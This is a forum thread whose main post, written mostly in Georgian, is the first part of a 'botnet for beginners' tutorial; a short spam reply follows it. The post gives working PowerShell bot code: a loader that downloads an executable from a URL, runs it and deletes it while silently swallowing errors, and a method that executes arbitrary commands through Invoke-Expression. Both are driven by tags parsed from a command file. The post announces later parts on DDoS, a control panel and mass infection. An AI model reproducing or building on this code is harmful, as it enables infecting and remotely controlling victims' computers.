Botnet for beginners | ბოტნეტი დამწყებთათვის | Cyber Community | Hi-Tech World - CYBSECGROUP
Welcome to the CYBSECGROUP Forum
You have the opportunity to get acquainted with interesting projects in an interesting environment
Registration

Botnet for beginners | ბოტნეტი დამწყებთათვის

M4XR10T

M4XR10T

Loading... 👽
Founder CEO
Alien 👽
#1
Aug 17, 2021
5
6
23
Geneva, Switzerland
#1
მოგესალმებით , ეს არის საპილოტე სტატია BOTNET-ებზე
ამ სტატიაში თქვენ ისწავლით ბოტნეტის შექმნას რომელსაც ექნება მანქანების ინფიცირების თვისება.
ჩვენი botnet-ის გასაშვებად პირველ ეტაპზე საჭირო იქნება ბრძანებების .txt ფაილში შენახვა .
პირველი ნაწილი :
• ჩვენი ბოტის კარკასი
• საწყისი ფუნქციების დამატება: Loader ფაილები, ბრძანებების გამოძახება
• Pars ამოცანები ბოტებისთის და მათი გახორციელება
თავად სტატია რამდენიმე ნაწილად იყოფა
1. ბოტის პრინციპები და საფუძველი,C&C სერვერი და მათი შესრულება.
2. ფუნქციური გაფართოება. DDOS მეთოდების დამატება.
3. ბოტნეტის პანელის დამატება.
4. Malware-ის მიწოდების მეთოდები. მარტივი ტქენიკა / მასობრივი იმფიცირება
დასაწყისისთვის ვამატებთ .ps1 ფაილს ნებისმიერი სახელით. ვრთავთ windows powershell-ს , და ვირჩევთ ჩვენს შექმნილ ფაილს (Ctrl+o).
ახლა ვამატებთ : System.IO - რათა იმუშაოს პაპკებთან და ფაილებთან, System.Regex - კონფიგურაციის გასაპარსად, System.diagnostic - პროცესების გასაშვებად და System.net - ქსელში სამუშაოდ.

Code: 
using namespace System.IO
using namespace System.Regex
using namespace System.Diagnostics
using namespace System.Net
ახლა კი დავამატოთ 2 დამხმარე ფუნქცია: randomString - რომელსაც გამოაქვს რენდომლი სიმბოლოები, JsonRegex

Code: 
function randomString()
{
return $(-join ((48..57) + (97..122) | Get-Random -Count 32 | % {[char]$_}))
}

function jsonRegex($tag1, $tag2)
{
 return "(?<=$tag1)(.*)(?=$tag2)"
}
ახლა დროა დავამატოთ საბაზისო მოდულები. კლასი „modules“

Code: 
Class Modules
{
# Modules Here
}
ვამატებთ ბოტის პირველ მეთოდს - Loader. „modules“ კლასსში ვამატებთ ახალ მეთოდს სახელად „Loader“. რომელიც აიღებს ორ არგუმენტს : URL & selfDelete

Code: 
static Loader([string]$url, [bool]$selfDelete)
 {
  try
  {
   $output = "$([Path]::GetTempPath())$(randomString).exe" # Output path with random file name
  # Write-Host $output
   $wc = [WebClient]::new() # new class object

   $wc.DownloadFile($url, $output) # File load
   [Process]::Start($output) # Run file
 
   if($selfDelete)
    {
      [File]::Delete($output); # Remove output file
    }
  }
  catch{}   
 }
ვამატებთ ახალ მეთოდს რომელიც დააინვოკებს powershell კომანდებს : invokeCommand

Code: 
static invokeCommand([string]$command2invoke)
 {
 try{
   Invoke-Expression($command2invoke)
   }
   catch{}
 }
როგორც სტატიის დასაწყისში ვთქვი, პირველ ეტაპზე ჩვენ ვიცავთ ბრძანებებს txt ფაილში, ასე რომ, ჩვენ ვქმნით ახალ ტექსტურ ყუთს და დავამატებთ შემდეგს:

Code: 
<ps>Write-Host "Method Invoked!"</ps>
ახლა კი ვამატებთ ახალ კლასს სახელად „MainClass“.

Code: 
Class MainClass
{
 static [string]$content = [File]::ReadAllText("C:\Users\%USERNAME%\Desktop\content.txt"); # Path to .txt file
}
დავამატოთ ახალი მეთოდი სახელად „Main“.რომელიც იქნება მთავარი და ვამატებთ 2 ამოცანას Regex: loaderReg და PsCommand.

Code: 
static Main()
 {
   [Regex]$loaderReg = [Regex]::new($(jsonRegex -tag1 "<loader>" -tag2 "</loader>"))
   [Regex]$psCommand = [Regex]::new($(jsonRegex -tag1 "<ps>" -tag2 "</ps>"))                                                                                                                                                                                                                             
 }
ახლა კი ვატარებთ მარტივ შემოწმებას.

Code: 
   if($loaderReg.IsMatch([MainClass]::content))
   {
     [string]$url = $loaderReg.Match([MainClass]::content)
     [Modules]::Loader($url, $true)
   }
 
   if($psCommand.IsMatch([MainClass]::content))
   {
     [string]$command = $psCommand.Match([MainClass]::content)
     [Modules]::invokeCommand($command)
   }
ამასობაში პარსვა დამთავრდა . ტექსტ ფაილში ვამატებთ მარტივ კომანდს.

Code: 
<ps>Write-Host "Method Succes Invoked!"</ps>
ვინახავთ ფაილს,ბოტის კოდში ვიძახებთ მთავარ მეთოდს ([MainClass]::Main()) და ვუშვებთ სკრიპტს
 
Last edited by a moderator:
Likes: GoGu and G30RG14N

Janisopili

Loading... 👽
CSG Member
#2
Sep 2, 2021
1
0
42
Russia
#2
Hey, hope you are well! I'm a simple girl who loves having fun chatting and meeting new people. You will always find me smiling and happy because nothing disturb me!
 
You must log in or register to reply here.